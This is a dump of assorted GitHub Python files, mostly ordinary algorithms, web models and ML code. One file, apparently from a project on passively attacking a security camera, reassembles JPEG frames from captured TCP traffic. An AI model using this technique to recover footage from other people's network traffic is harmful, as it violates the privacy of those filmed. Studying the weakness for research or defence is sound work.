map(int, input().split())\n graph = [ [] for i in range(vertexs) ]\n\n for i in range(edges) :\n line = [int(x) for x in input().split()]\n graph[line[0]].append((line[1], line[2]))\n graph[line[1]].append((line[0], line[2]))\n print(getShortest(graph,start,end))\n\nif __name__ == \"__main__\":\n 
main()","repo_name":"fineman999/Algorithm","sub_path":"Elice/Graph/shortest_distance.py","file_name":"shortest_distance.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"1410296465","text":"import os\nimport json\nfrom Parser import Decompiler, ParseFull, ParseHeader\nfrom DatabaseManager import DatabaseManager\nfrom pprint import pprint\nfrom tqdm import tqdm\n\nclass ReplayDatabaseManager:\n\n\tdefaultDatabasePath = 'ReplayDB.csv'\n\tdefaultDatabaseHeader = [ 'Path', 'Name', 'GUID']\n\n\tdef __init__(self, attributes):\n\t\tself.databaseManager = DatabaseManager()\n\t\tself.demoPathAttributes = attributes\n\t\tself.setAttributes()\n\t\tself.replayDict = {}\n\t\t\n\tdef setAttributes(self):\n\t\tself.replayList = self.demoPathAttributes[1]\n\t\tself.replayBatches = self.demoPathAttributes[4]\n\t\tself.singleBatch = self.demoPathAttributes[7]\n\n\tdef getReplayGUID(self, replay, parser):\n\t\ttry:\n\t\t\tjsonObject = Decompiler(replay).decompile(parser=parser, logTime=False)\n\t\t\tguid = ParseFull(jsonObject, parser).getGUID()\n\t\t\tif any(guid): return guid \n\t\t\telse: return 'None'\n\t\texcept:\n\t\t\treturn 'Error'\n\n\tdef getBatchGUIDs(self, batch):\n\t\tfor replay in batch:\n\t\t\treplay[2] = self.getReplayGUID(replay[0], 'boxcars')\n\t\treturn batch\n\n\tdef getReplayHeader(self, replay, parser):\n\t\tjsonObject = Decompiler(replay).decompile(parser=parser, logTime=False)\n\t\theader = ParseHeader(jsonObject).getHeaderData()\n\t\tif any(header): return header \n\t\telse: return 'None'\n\t\tpass\n\n\tdef getBatchHeaders(self):\n\t\tfor batch in tqdm(self.replayBatches, desc='Export progress: ', position=0):\n\t\t\tfor replay in tqdm(batch, desc='\tBatch progress: ', ncols=100, position=1):\n\t\t\t\tif os.path.getsize(replay[0]) > 30000:\n\t\t\t\t\ttry:\n\t\t\t\t\t\theader = self.getReplayHeader(replay[0], 'boxcars')\n\t\t\t\t\t\treplayName = self.sanitizeReplayName(replay[1])\n\t\t\t\t\t\tself.replayDict[replayName] = header\n\t\t\t\t\texcept:\n\t\t\t\t\t\treplayName = self.sanitizeReplayName(replay[1])\n\t\t\t\t\t\tself.replayDict[\"Error\"] = {replayName:'Error'}\n\t\t\n\t\theaderjson = self.dictToJson(self.replayDict)\n\t\tself.outputJSON(headerjson)\n\n\tdef sanitizeReplayName(self, replayName):\n\t\treturn replayName.replace('.replay', '')\n\n\tdef printAllGUIDs(self):\n\t\tfor batch in self.replayBatches:\n\t\t\tfor replay in batch:\n\t\t\t\tprint(\"GUID: \" + self.getReplayGUID(replay[0], 'boxcars'))\n\n\tdef exportReplayDatabase(self, header=defaultDatabaseHeader, path=defaultDatabasePath, sequential=True):\n\t\tif sequential:\n\t\t\tdata = []\n\t\t\tself.databaseManager.createBackupCSV(path)\n\t\t\tif not self.singleBatch:\n\t\t\t\tfor batch in tqdm(self.replayBatches, desc='Export progress: ', position=0):\n\t\t\t\t\tfor replay in tqdm(batch, desc='\tBatch progress: ', ncols=100, position=1):\n\t\t\t\t\t\treplay[2] = self.getReplayGUID(replay[0], 'boxcars')\n\t\t\t\t\t\treplay.append(replay.pop(0))\n\t\t\t\t\t\tdata.append(replay)\n\t\t\t\t\t\tself.databaseManager.write(data, header, path, False)\n\t\t\telse:\n\t\t\t\tfor replay in self.replayList:\n\t\t\t\t\treplay[2] = self.getReplayGUID(replay[0], 'boxcars')\n\t\t\t\t\treplay.append(replay.pop(0))\n\t\t\t\t\tdata.append(replay)\n\t\t\t\t\tself.databaseManager.write(data, header, path, False)\n\t\telse:\n\t\t\tdata = [y for x in self.replayBatches for y in x]\n\t\t\tself.databaseManager.write(data, header, 
path)\n\n\t\n\t\t#pprint(self.importedDatabase)\n\n\tdef dictToJson(self, dictData):\n\t\tdata = json.dumps(dictData)\n\t\tloadedData = json.loads(data)\n\t\treturn loadedData\n\n\tdef outputJSON(self, jsonObject):\n\t\twith open('Resources/data2.json', 'w') as outfile:\n\t\t json.dump(jsonObject, outfile, indent=4, separators=(',', ': '), sort_keys=True)\n\n \n\n","repo_name":"Xylot/Vextra","sub_path":"ReplayDatabaseManager.py","file_name":"ReplayDatabaseManager.py","file_ext":"py","file_size_in_byte":3292,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"6279602652","text":"# Новая задача глава 4, задача 13, под названием разработка\n\n# Напишите программу, которая подсчитывает количество ячеек в таблице, содержащий 5 строк и 2 столбца. При этом:\n\na=2\nb=5\nfor i in range(a):\n i+=1\n\n for j in range(b):\n j+=1\n print(i,' ',j)","repo_name":"Nurbek2405/TasksInPython","sub_path":"Chapter 4 task 13.py","file_name":"Chapter 4 task 13.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"70568193545","text":"from logger import log\nfrom pathlib import Path\nfrom logger import FGColor\n\n# print(REVERSED + \"Hola\" + RESET)\n# print(BOLD + \"Hola\")\n# print(UNDERLINE + \"Hola\" + RESET)\n\nlog.error(\"An Error Occurred Unexpectedly\")\nlog.warning(\"Something strange is happening\")\nlog.success(\"Everything is working fine\")\nlog.info(\"Something is working...\")\n\nlog.enable_save_to_txt(path=Path.cwd())\nlog.enable_timestamp()\n\nlog.info(\"Some text\")\nlog.error(\"Some error\")\n\nlog.set_log_timestamp_format(\"[%H:%M]\")\n\nlog.info(\"Other text\")\n\nlog.color(FGColor.red, \" .----------------. \")\nlog.color(FGColor.green, \"| _ |\")\nlog.color(FGColor.yellow, \"| _.-'|'-._ |\")\nlog.color(FGColor.blue, \"| .__.| | | |\")\nlog.color(FGColor.magenta, \"| |_.-'|'-._| |\")\nlog.color(FGColor.cyan, \"| '--'| | | |\")\nlog.color(FGColor.white, \"| '--'|_.-'`'-._| |\")\nlog.color(FGColor.red, \"| '--' ` |\")\nlog.color(FGColor.green, \" '----------------'\")\n\n\n# example API usage\n\n# log.INFO(\"some text\") #prints \"[?] INFO: some text\" with colors\n# log.enable_save_to_txt(\"C:/SomeFolder\") #stars saving following logs to txt into path, if empty saves to class position\n# log.WARNING(\"something's happening\") #prints \"[!] 
WARNING: something's happening\" with colors both to cmd and to txt\n# log.enable_date_timestamp(\"dd/mm/yy\") #starts printing text with date timestamp with the given format (default = \"dd/mm/yy\")\n# log.enable_time_timestamp(\"hh:mm:ss\") #stars printing text with time timestamp with the given format (default = \"hh:mm:ss\")\n# log.disable_colors()\n# log.enable_colors()\n\n# stuff to test: template method, strategy, classes/inheritance, composition, many little classes combined into one\n\n# implementing your own logger\n\nfrom logger import log_context, custom_logger\nfrom pathlib import Path\n\n\nclass MyLogger(custom_logger.MiniLog):\n def log(self, text):\n print(text)\n\n\nlog_context.set_logger(MyLogger())\n\nlog_context.log(\"text\")\n","repo_name":"Cogno-Marco/YetAnotherPyLogger","sub_path":"tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"6195389518","text":"#----------Merge Sort----------#\r\n\r\ndef mergeSortedLists(list1,list2):\r\n newArray=[]\r\n i=0; j=0\r\n while (i < len(list1) and j < len(list2)):\r\n if (list1[i] < list2[j]):\r\n newArray.append(list1[i])\r\n i+=1\r\n else:\r\n newArray.append(list2[j])\r\n j+=1\r\n while (i < len(list1)): #Add remaining elements of the list that contains more elements than the other\r\n newArray.append(list1[i])\r\n i+=1\r\n while (j < len(list2)): #Add remaining elements of the list that contains more elements than the other\r\n newArray.append(list2[j])\r\n j+=1\r\n return newArray\r\n\r\ndef mergeSort(list):\r\n print(\"Incoming list: \",list)\r\n if (len(list)<=1):\r\n return list\r\n middle=len(list)//2\r\n leftList=mergeSort(list[:middle])\r\n rightList=mergeSort(list[middle:])\r\n newList=mergeSortedLists(leftList,rightList)\r\n print(\"Outgoing list: \",list)\r\n return newList\r\n\r\n#------------------------------#\r\n\r\nimport random\r\n\r\ndizi=[]\r\nfor i in range(0,10):\r\n dizi.append(random.randint(10,100))\r\n\r\nnewList=mergeSort(dizi)\r\nprint(newList)\r\n\r\nmergeSort(newList)\r\n\r\n#------------------------------#","repo_name":"ErenGaripagaoglu/Python-VeriYapilari","sub_path":"mergeSort.py","file_name":"mergeSort.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"41233715513","text":"import torch\nimport torch.nn as nn\nfrom reagent import types as rlt\nfrom reagent.models.base import ModelBase\n\n\nclass Seq2RewardNetwork(ModelBase):\n def __init__(self, state_dim, action_dim, num_hiddens, num_hidden_layers):\n super().__init__()\n\n self.state_dim = state_dim\n self.action_dim = action_dim\n self.num_hiddens = num_hiddens\n self.num_hidden_layers = num_hidden_layers\n self.rnn = nn.LSTM(\n input_size=action_dim, hidden_size=num_hiddens, num_layers=num_hidden_layers\n )\n\n self.lstm_linear = nn.Linear(num_hiddens, 1)\n self.map_linear = nn.Linear(state_dim, self.num_hiddens)\n\n def input_prototype(self):\n return (\n rlt.FeatureData(torch.randn(1, 1, self.state_dim)),\n rlt.FeatureData(torch.randn(1, 1, self.action_dim)),\n )\n\n def forward(self, state: rlt.FeatureData, action: rlt.FeatureData):\n \"\"\" Forward pass of Seq2Reward\n\n Takes in the current state and use it as init hidden\n The input sequence are pure actions only\n Output the predicted reward after each time step\n\n :param actions: (SEQ_LEN, BATCH_SIZE, ACTION_DIM) torch tensor\n :param states: 
(SEQ_LEN, BATCH_SIZE, STATE_DIM) torch tensor\n\n :returns: predicated accumulated rewards at last step for the given sequence\n - reward: (BATCH_SIZE, 1) torch tensor\n \"\"\"\n states = state.float_features\n actions = action.float_features\n hidden = self.get_initial_hidden_state(\n states[0][None, :, :], batch_size=states.size(1)\n )\n # use last hidden from the topmost hidden layer to predict reward\n # the size of reward should be converted to (BATCH_SIZE, 1)\n all_steps_hidden, last_step_hidden_and_cell = self.rnn(actions, hidden)\n lstm_outs = self.lstm_linear(last_step_hidden_and_cell[0])\n reward = lstm_outs[-1, :, -1].unsqueeze(1)\n\n return rlt.Seq2RewardOutput(acc_reward=reward)\n\n def get_initial_hidden_state(self, state, batch_size=1):\n # state embedding with linear mapping\n # repeat state to fill num_hidden_layers at first dimension\n state = state.repeat(self.num_hidden_layers, 1, 1)\n state_embed = self.map_linear(state)\n\n # hidden = (hidden,cell) where hidden is init with liner map\n # of input state and cell is 0.\n # hidden :\n # TUPLE(\n # (NUM_LAYERS, BATCH_SIZE, HIDDEN_SIZE),\n # (NUM_LAYERS, BATCH_SIZE, HIDDEN_SIZE)\n # ) torch tensor\n hidden = (\n state_embed,\n torch.zeros(self.num_hidden_layers, batch_size, self.num_hiddens),\n )\n\n return hidden\n","repo_name":"UofT-EcoSystem/rlscope_ReAgent","sub_path":"reagent/models/seq2reward_model.py","file_name":"seq2reward_model.py","file_ext":"py","file_size_in_byte":2726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"23788925635","text":"# -*- coding: utf-8 -*-\nfrom django.db import models\nfrom caravanamigrante.models import Caravanamigrante\nfrom authuser.models import AuthUser\nfrom django.contrib.auth.models import User\nfrom django.utils import timezone\n\n# Create your models here.\n\nclass Migrante(models.Model):\n\n GENERO_CHOICE = (\n ('M', 'MASCULINO'),\n ('F', 'FEMENINO'),\n ('O', 'OTRO'),\n )\n\n\n idmigrante = models.AutoField(db_column='IdMigrante', primary_key=True) \n nombre = models.CharField('Nombre:', db_column='Nombre', max_length=50) \n apellido = models.CharField('Apellido:', db_column='Apellido', max_length=50) \n telefono = models.CharField('Teléfono:', db_column='Telefono', max_length=16) \n genero = models.CharField('Género:', db_column='Genero', choices=GENERO_CHOICE, max_length=1)\n fechanacimiento = models.DateField('Fecha de Nacimiento:', db_column='FechaNacimiento')\n nacionalidad = models.CharField('Nacionalidad:', db_column='Nacionalidad', max_length=50)\n caravana = models.ForeignKey(Caravanamigrante, on_delete=models.CASCADE, blank=True, null=True) \n usuario = models.ForeignKey(User, models.DO_NOTHING, db_column='FKIdUsuario')\n\n def edad(self):\n try:\n cadena = int((timezone.now().date() - self.fechanacimiento).days / 365.25)\n return cadena\n except:\n cadena = []\n return cadena\n\n def __str__(self):\n return '%s %s' % (self.nombre, self.apellido)\n\n class Meta:\n verbose_name = 'Migrante'\n verbose_name_plural = 'Migrantes'","repo_name":"lisdy20/Proyecto","sub_path":"migrante/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"72437050504","text":"from django.shortcuts import render, redirect\nfrom .models import Dojos, Ninjas\n\ndef index(request):\n context = {\n 'dojos' : Dojos.objects.all()\n }\n return render(request, \"index.html\", context)\n\ndef 
add_ninja(request):\n print(request.POST)\n print('Creating ninja')\n #get dojo instance\n dojo_instance = Dojos.objects.get(id=request.POST['dojo_id'])\n ninja = Ninjas.objects.create(\n first_name=request.POST['first_name'],\n last_name=request.POST['last_name'],\n dojo = dojo_instance\n )\n print(ninja)\n return redirect('/')\n\n\ndef add_dojo(request):\n print(request.POST)\n print('Creating dojo')\n dojo = Dojos.objects.create(\n name=request.POST['name'],\n city=request.POST['city'],\n state=request.POST['state']\n )\n print(dojon)\n return redirect('/')\n","repo_name":"bellos711/python_practice","sub_path":"django/django_orm/dojo_n_ninjas/dojoninja_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73534940105","text":"import threading\nimport time\nfrom queue import Queue\nimport requests\nimport json\nimport csv\ndef solicitacao(url):\n \n resp = json.loads(requests.get(url).text)\n outputFile = open('COVID-19 CORONAVIRUS OUTBREAK.csv',\t'w',\tnewline='')\n outputWriter = csv.writer(outputFile)\n outputWriter.writerow(['Date', 'countrie', 'TotalDeaths', 'SeriousCases','TotalCases'])\n print(\"countrie Total Cases\")\n with conteudo:\n for elem in resp:\n print(\"%s %s \"%(elem['name'],elem['totalCases']))\n outputWriter.writerow([elem['updatedAt'],elem['name'],elem['totalCases'],elem['totalDeaths'],elem['seriousCases']])\n outputFile.close()\n\ndef gerenciador():\n\n while True:\n url_presente = fila.get()\n solicitacao(url_presente)\n fila.task_done()\n\nquantidade_threads = 5\nconteudo = threading.Lock()\nfila = Queue()\nurl = \"https://exchange.vcoud.com/coronavirus/latest\"\nfor i in range(quantidade_threads):\n t = threading.Thread(target=gerenciador)\n t.daemon = True\n t.start()\n start = time.time()\n fila.put(url)\nfila.join()\nprint((time.time() - start))\n","repo_name":"cardosource/COVID-19-CORONAVIRUS-OUTBREAK","sub_path":"COVID-19 CORONAVIRUS OUTBREAK.py","file_name":"COVID-19 CORONAVIRUS OUTBREAK.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"22278490714","text":"from PIL import Image\nfrom scapy.all import *\nimport os\nimport shutil\nimport extractFileTCP\n\nglobal fileLen;\nnumOfImage = 0\nglobal stop\nii = 0\nglobal data\nglobal pl\ndirName = 'outputDir/'\npath = \"outputDir/\"\n\n# Creates folder that contains all the extracted images from the TCP raws\ndef createImagesFolder():\n try:\n #os.remove('rawBytesFile')\n # Create target Directory\n os.mkdir(dirName)\n except FileExistsError:\n # if target Directory exist, it delete the directory and all its containment\n shutil.rmtree(dirName, ignore_errors=True)\n # Then creates target Directory\n os.mkdir(dirName)\n return dirName\n\n\ndef openImage(imageName):\n img = Image.open(imageName)\n img.show()\n\n# create the image file , from raw data bytes array , using startImage and endImage indexes\ndef createImage(startImageIndex, endImageIndex, numOfImage=None):\n fileName = \"image{0}.jpg\".format(numOfImage)\n fullpath = os.path.join(path, fileName)\n\n with open(fullpath, 'wb') as f:\n f.write(data[startImageIndex:endImageIndex])\n if endImageIndex < fileLen:\n numOfImage += 1\n print(\"create new image\")\n findStartOfImage(endImageIndex, numOfImage)\n\n\n# extract the end of the image index by find the (ffd90d0a) value in raw bytes array relatively to 
idxStartImage\ndef findEndOfImage(idxStartImage,numOfImage=None):\n # pl contains all the tcp stream extracted from the pcap file\n ii = idxStartImage\n len = pl.__len__()\n while (ii+3) < len:\n hexVal = hex(pl[ii])\n hexValAfter1 = hex(pl[ii + 2]) #A variable that keeps '0d'\n hexValAfter2 = hex(pl[ii + 3]) #A variable that keeps '0a'\n # check if hexVal variable is 'ff' in Hex\n if hexVal == '0xff':\n nextHexVal = hex(pl[ii + 1])\n # check if nextHexVal variable is 'd9' in Hex\n if nextHexVal == '0xd9':\n #Check if those variables contain '0a' and '0d'\n if hexValAfter1 == '0xd' and hexValAfter2 == '0xa':\n idxEndImage=ii\n createImage(idxStartImage, idxEndImage,numOfImage)\n ii += 1\n\n# extract the end of the image index by find the (0d0affd8) value in raw bytes array relatively to last startIndex\ndef findStartOfImage(startIndex,numOfImage=None):\n\n ii = startIndex\n len = pl.__len__()\n while (ii + 3) < len:\n hexVal = hex(pl[ii])\n if ii > 2:\n hexValBefor1 = hex(pl[ii-1]) #A variable that keeps '0a'\n hexValBefor2 = hex(pl[ii-2]) #A variable that keeps '0d'\n\n # check if hexVal variable is 'ff' in Hex\n if hexVal == '0xff':\n # Check if those variables contain '0a' and '0d'\n if hexValBefor1 == '0xa' and hexValBefor2 == '0xd':\n nextHexVal = hex(pl[ii+1])\n # check if nextHexVal variable is 'd8' in Hex\n if nextHexVal == '0xd8':\n findEndOfImage(ii,numOfImage)\n ii += 1\n\n\n# if __name__ == '__main__':\n# createImagesFolder()\n# fname=extractFileTCP.TcpPcapToRawBytesFile()\n# with open(fname, 'rb') as f:\n# data = f.read()\n# # pl contains all the tcp stream extracted from the pcap file\n# pl = ([p for p in data])\n# file_stats = os.stat(fname)\n# fileLen = file_stats.st_size\n# print(\"fileLen = %d\",fileLen)\n# findStartOfImage(0, numOfImage)\n","repo_name":"OdeliaHochman/Passive-Attack-on-a-Security-Camera","sub_path":"convertTcpStreamToImages.py","file_name":"convertTcpStreamToImages.py","file_ext":"py","file_size_in_byte":3385,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"2574143790","text":"class Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n\nclass LinkedList:\n def __init__(self):\n self.head = None\n\n def push(self, data):\n new_node = Node(data)\n new_node.next = self.head\n self.head = new_node\n\n def detectLoop(self):\n slow_ptr = self.head\n fast_ptr = self.head\n while slow_ptr and fast_ptr and fast_ptr.next:\n slow_ptr = slow_ptr.next\n fast_ptr = fast_ptr.next.next\n if slow_ptr == fast_ptr:\n return True\n else:\n return False\n\n def printList(self):\n temp = self.head\n while temp:\n print(temp.data)\n temp = temp.next\n\n\nllist = LinkedList()\nllist.push(20)\nllist.push(4)\nllist.push(15)\nllist.push(10)\n\n# Create a loop for testing\nllist.head.next.next.next.next = llist.head\nif llist.detectLoop():\n print(\"yes\")\nelse:\n print(\"no\")","repo_name":"mrunalhirve12/Interviews2","sub_path":"LinkedList/Detect Loop.py","file_name":"Detect Loop.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"14029546454","text":"#-*- coding: utf-8 -*-\n#矩阵入库\nimport face_recognition as fr\nimport numpy as np\nimport pymysql\n\n\ndb = pymysql.connect(\"localhost\",\"root\",\"\",\"baiduyun\" )\ncursor = db.cursor()\nsql = \"select * from face where tzm=0 order by id asc\"\ncursor.execute(sql)\nresults = cursor.fetchall()\nfor row in results:\n\tid = row[0]\n\tname = 
row[1]\n\timg = row[2]\n\timg_a = fr.load_image_file(img)\n\t#特征码转换矩阵\n\ttry:\n\t\tencoding_a = fr.face_encodings(img_a,known_face_locations=None, num_jitters=0)[0] #0池化操作。数值越高,精度越高,但耗时越长\n\t\t\n\t\tencoding__array_list = encoding_a.tolist()\n\t\t# 将列表里的元素转化为字符串\n\t\tencoding_str_list = [str(i) for i in encoding__array_list]\n\t\t# 拼接列表里的字符串\n\t\tencoding_str = ','.join(encoding_str_list)\n\texcept IndexError:\n\t\tprint (\"Error: 没有识别人脸\")\n\t\tencoding_str = str(0)\n\telse:\n\t\tprint ('ok')\n\t#为了入库 numpy.darray转换list\n\tins = \"update face set tzm='\"+encoding_str+\"' where id=\" + str(id)\n\tcursor.execute(ins)\n\tdb.commit()\n\t\ndb.close()\t\t \n\n\n\n","repo_name":"jyht/ai","sub_path":"insert.py","file_name":"insert.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"22012425427","text":"import tensorflow as tf\nimport tf_utils_subspace\nimport parser_ops\n\nparser = parser_ops.get_parser()\nargs = parser.parse_args()\n\n\nclass data_consistency():\n \"\"\"\n Data consistency class can be used for:\n -performing E^h*E operation in the paper\n -transforming final network output to kspace\n \"\"\"\n\n def __init__(self, sens_maps, mask, basis, stk):\n with tf.name_scope('EncoderParams'):\n self.shape_list = tf.shape(mask)\n self.sens_maps = sens_maps\n self.mask = mask\n self.basis = basis\n self.stk = stk\n self.shape_list = tf.shape(mask)\n self.scalar = tf.complex(tf.sqrt(tf.to_float(self.shape_list[0] * self.shape_list[1])), 0.)\n\n def EhE_Op(self, img, mu):\n \"\"\"\n Performs (E^h*E+ mu*I) x\n \"\"\"\n with tf.name_scope('EhE'):\n for kk in range(args.nbasis_GLOB):\n coil_imgs_ = self.sens_maps * img[..., kk]\n kspace_ = tf.expand_dims(tf_utils_subspace.tf_fftshift(tf.fft2d(tf_utils_subspace.tf_ifftshift(coil_imgs_))) / self.scalar, axis=-1)\n if kk == 0:\n kspace = kspace_\n else:\n kspace = tf.concat([kspace, kspace_], axis=-1)\n\n kspace_r = tf_utils_subspace.tf_complex2real(kspace)\n masked_kspace_r = tf.reduce_sum(tf.reshape(kspace_r[..., 0], [args.ncoil_GLOB, args.nrow_GLOB, args.ncol_GLOB, 1, args.nbasis_GLOB]) * \\\n tf.transpose(self.stk, perm=[2, 0, 1, 3, 4]), axis=-1, keepdims=True)\n masked_kspace_i = tf.reduce_sum(tf.reshape(kspace_r[..., 1], [args.ncoil_GLOB, args.nrow_GLOB, args.ncol_GLOB, 1, args.nbasis_GLOB]) * \\\n tf.transpose(self.stk, perm=[2, 0, 1, 3, 4]), axis=-1, keepdims=True)\n masked_kspace = tf_utils_subspace.tf_real2complex(tf.concat([masked_kspace_r, masked_kspace_i], axis=-1))\n masked_kspace = tf.reshape(masked_kspace, [args.ncoil_GLOB, args.nrow_GLOB, args.ncol_GLOB, args.nbasis_GLOB])\n\n for kk in range(args.nbasis_GLOB):\n masked_img_ = tf_utils_subspace.tf_ifftshift(tf.ifft2d(tf_utils_subspace.tf_fftshift(masked_kspace[..., kk]))) * self.scalar\n masked_img_comb_ = tf.expand_dims(tf.reduce_sum(masked_img_ * tf.conj(self.sens_maps), axis=0), axis=-1)\n if kk == 0:\n masked_img_comb = masked_img_comb_\n else:\n masked_img_comb = tf.concat([masked_img_comb, masked_img_comb_], axis=-1)\n\n ispace = masked_img_comb + mu * img\n\n return ispace\n\n def SSDU_kspace(self, img):\n \"\"\"\n Transforms unrolled network output to k-space\n and selects only loss mask locations(\\Lambda) for computing loss\n \"\"\"\n\n with tf.name_scope('SSDU_kspace'):\n coil_imgs = self.sens_maps * img\n kspace = tf_utils_subspace.tf_fftshift(tf.fft2d(tf_utils_subspace.tf_ifftshift(coil_imgs))) / self.scalar\n masked_kspace = kspace * self.mask\n\n return 
masked_kspace\n\n def Supervised_kspace(self, img):\n \"\"\"\n Transforms unrolled network output to k-space\n \"\"\"\n\n with tf.name_scope('Supervised_kspace'):\n coil_imgs = self.sens_maps * img\n kspace = tf_utils_subspace.tf_fftshift(tf.fft2d(tf_utils_subspace.tf_ifftshift(coil_imgs))) / self.scalar\n\n return kspace\n \n def Supervised_single_kspace(self, img):\n \"\"\"\n Transforms unrolled network output to k-space\n \"\"\"\n\n with tf.name_scope('Supervised_kspace'):\n kspace = tf.squeeze(tf_utils_subspace.tf_fftshift(tf.fft2d(tf_utils_subspace.tf_ifftshift(tf.expand_dims(img, axis=0)))), axis=0) / self.scalar\n\n return kspace\n\n def Supervised_single_image(self, kspace):\n \"\"\"\n Transforms unrolled network output to image\n \"\"\"\n\n with tf.name_scope('Supervised_image'):\n image = tf.squeeze(tf_utils_subspace.tf_ifftshift(tf.ifft2d(tf_utils_subspace.tf_fftshift(tf.expand_dims(kspace, axis=0)))), axis=0) * self.scalar\n\n return image\n\n\ndef conj_grad(input_elems, mu_param):\n \"\"\"\n Parameters\n ----------\n input_data : contains tuple of reg output rhs = E^h*y + mu*z , sens_maps and mask\n rhs = nrow x ncol x 2\n sens_maps : coil sensitivity maps ncoil x nrow x ncol\n mask : nrow x ncol\n mu : penalty parameter\n\n Encoder : Object instance for performing encoding matrix operations\n\n Returns\n -------\n data consistency output, nrow x ncol x 2\n\n \"\"\"\n\n rhs, sens_maps, mask, basis, stk = input_elems\n mu_param = tf.complex(mu_param, 0.)\n for kk in range(args.nbasis_GLOB):\n rhs_c_ = tf.expand_dims(tf_utils_subspace.tf_real2complex(rhs[..., kk * 2:(kk + 1) * 2]), axis=-1)\n if kk == 0:\n rhs_c = rhs_c_\n else:\n rhs_c = tf.concat([rhs_c, rhs_c_], axis=-1)\n rhs = rhs_c\n Encoder = data_consistency(sens_maps, mask, basis, stk)\n cond = lambda i, *_: tf.less(i, args.CG_Iter)\n\n def body(i, rsold, x, r, p, mu):\n with tf.name_scope('CGIters'):\n Ap = Encoder.EhE_Op(p, mu)\n alpha = tf.complex(rsold / tf.to_float(tf.reduce_sum(tf.conj(p) * Ap)), 0.)\n x = x + alpha * p\n r = r - alpha * Ap\n rsnew = tf.to_float(tf.reduce_sum(tf.conj(r) * r))\n beta = rsnew / rsold\n beta = tf.complex(beta, 0.)\n p = r + beta * p\n\n return i + 1, rsnew, x, r, p, mu\n\n x = tf.zeros_like(rhs)\n i, r, p = 0, rhs, rhs\n rsold = tf.to_float(tf.reduce_sum(tf.conj(r) * r), )\n loop_vars = i, rsold, x, r, p, mu_param\n cg_out = tf.while_loop(cond, body, loop_vars, name='CGloop', parallel_iterations=1)[2]\n\n for kk in range(args.nbasis_GLOB):\n cg_out_r_ = tf_utils_subspace.tf_complex2real(cg_out[..., kk])\n if kk == 0:\n cg_out_r = cg_out_r_\n else:\n cg_out_r = tf.concat([cg_out_r, cg_out_r_], axis=-1)\n return cg_out_r\n\n\ndef dc_block(rhs, sens_maps, mask, basis, stk, mu):\n \"\"\"\n DC block employs conjugate gradient for data consistency,\n \"\"\"\n\n def cg_map_func(input_elems):\n cg_output = conj_grad(input_elems, mu)\n\n return cg_output\n\n dc_block_output = tf.map_fn(cg_map_func, (rhs, sens_maps, mask, basis, stk), dtype=tf.float32, name='mapCG')\n\n return dc_block_output\n\n\ndef SSDU_kspace_transform(nw_output, sens_maps, mask, basis, stk):\n \"\"\"\n This function transforms unrolled network output to k-space at only unseen locations in training (\\Lambda locations)\n \"\"\"\n\n nw_output = tf_utils_subspace.tf_real2complex(nw_output)\n\n def ssdu_map_fn(input_elems):\n nw_output_enc, sens_maps_enc, mask_enc = input_elems\n Encoder = data_consistency(sens_maps_enc, mask_enc, basis, stk)\n nw_output_kspace = Encoder.SSDU_kspace(nw_output_enc)\n\n return 
nw_output_kspace\n\n masked_kspace = tf.map_fn(ssdu_map_fn, (nw_output, sens_maps, mask), dtype=tf.complex64, name='ssdumapFn')\n\n return tf_utils_subspace.tf_complex2real(masked_kspace)\n\n\ndef Supervised_kspace_transform(nw_output, sens_maps, mask, basis, stk):\n \"\"\"\n This function transforms unrolled network output to k-space\n \"\"\"\n\n nw_output = tf_utils_subspace.tf_real2complex(nw_output)\n\n def supervised_map_fn(input_elems):\n nw_output_enc, sens_maps_enc, mask_enc = input_elems\n Encoder = data_consistency(sens_maps_enc, mask_enc, basis, stk)\n nw_output_kspace = Encoder.Supervised_kspace(nw_output_enc)\n\n return nw_output_kspace\n\n kspace = tf.map_fn(supervised_map_fn, (nw_output, sens_maps, mask), dtype=tf.complex64, name='supervisedmapFn')\n\n return tf_utils_subspace.tf_complex2real(kspace)\n\n\ndef Supervised_single_kspace_transform(nw_output, sens_maps, mask, basis, stk):\n \"\"\"\n This function transforms unrolled network output to k-space\n \"\"\"\n\n nw_output = tf_utils_subspace.tf_real2complex(nw_output)\n\n def supervised_map_fn(input_elems):\n nw_output_enc, sens_maps_enc, mask_enc = input_elems\n Encoder = data_consistency(sens_maps_enc, mask_enc, basis, stk)\n nw_output_kspace = Encoder.Supervised_single_kspace(nw_output_enc)\n\n return nw_output_kspace\n\n kspace = tf.map_fn(supervised_map_fn, (nw_output, sens_maps, mask), dtype=tf.complex64, name='supervisedmap_single_k_Fn')\n\n return tf_utils_subspace.tf_complex2real(kspace)\n\n\ndef Supervised_single_image_transform(nw_output, sens_maps, mask, basis, stk):\n \"\"\"\n This function transforms unrolled network output to image\n \"\"\"\n\n nw_output = tf_utils_subspace.tf_real2complex(nw_output)\n\n def supervised_map_fn(input_elems):\n nw_output_enc, 